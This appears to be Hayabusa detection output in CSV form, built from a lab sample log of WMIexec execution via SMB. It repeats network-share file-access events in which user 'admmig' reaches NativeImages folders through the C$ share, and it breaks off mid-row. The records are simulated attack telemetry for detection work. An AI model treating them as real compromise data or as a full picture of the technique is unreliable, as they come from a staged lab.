10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 